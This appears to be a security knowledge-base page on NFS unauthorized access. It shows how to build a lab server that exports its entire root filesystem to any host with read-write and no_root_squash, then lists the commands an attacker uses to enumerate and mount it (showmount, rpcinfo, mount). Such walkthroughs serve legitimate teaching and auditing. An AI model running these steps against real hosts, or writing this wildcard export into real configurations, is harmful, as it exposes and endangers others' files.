Unauthorized Access Vulnerability in NFS
Vulnerability Description
NFS (Network File System) is a network file system that allows sharing of files across different network hosts. When the NFS server is not properly configured or lacks access control mechanisms, there may be an unauthorized access vulnerability. Attackers can use this vulnerability to access files and data on the affected host, and even modify or delete sensitive information.
Environment Setup
# Install nfs service
yum install nfs-utils.x86_64 -y
# Start the service
systemctl start nfs-server.service
# Set up auto-start
systemctl enable rpcbind.service
systemctl enable nfs-server.service
# Configure nfs
vim /etc/exports
/ *(rw,sync,no_root_squash)
# Start sharing
exportfs -rVulnerability Exploitation
View sharing
[root@localhost tmp]# showmount -e
Export list for localhost.localdomain:
/ *Client mount command
mkdir /tmp/test
mount -t nfs 192.168.32.183:/ /tmp/testScan nfs
[root@localhost tmp]# rpcinfo -p 192.168.32.183
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 20048 mountd
100005 1 tcp 20048 mountd
100005 2 udp 20048 mountd
100024 1 udp 38880 status
100005 2 tcp 20048 mountd
100024 1 tcp 60551 status
100005 3 udp 20048 mountd
100005 3 tcp 20048 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 3 udp 2049 nfs_acl
100021 1 udp 48592 nlockmgr
100021 3 udp 48592 nlockmgr
100021 4 udp 48592 nlockmgr
100021 1 tcp 42350 nlockmgr
100021 3 tcp 42350 nlockmgr
100021 4 tcp 42350 nlockmgrView the mounted directory, all the files under the / directory will appear
ls /tmp/test/
PreviousUnauthorized Access Vulnerability in MemcachedNextUnauthorized Access Vulnerability in Redis
Last updated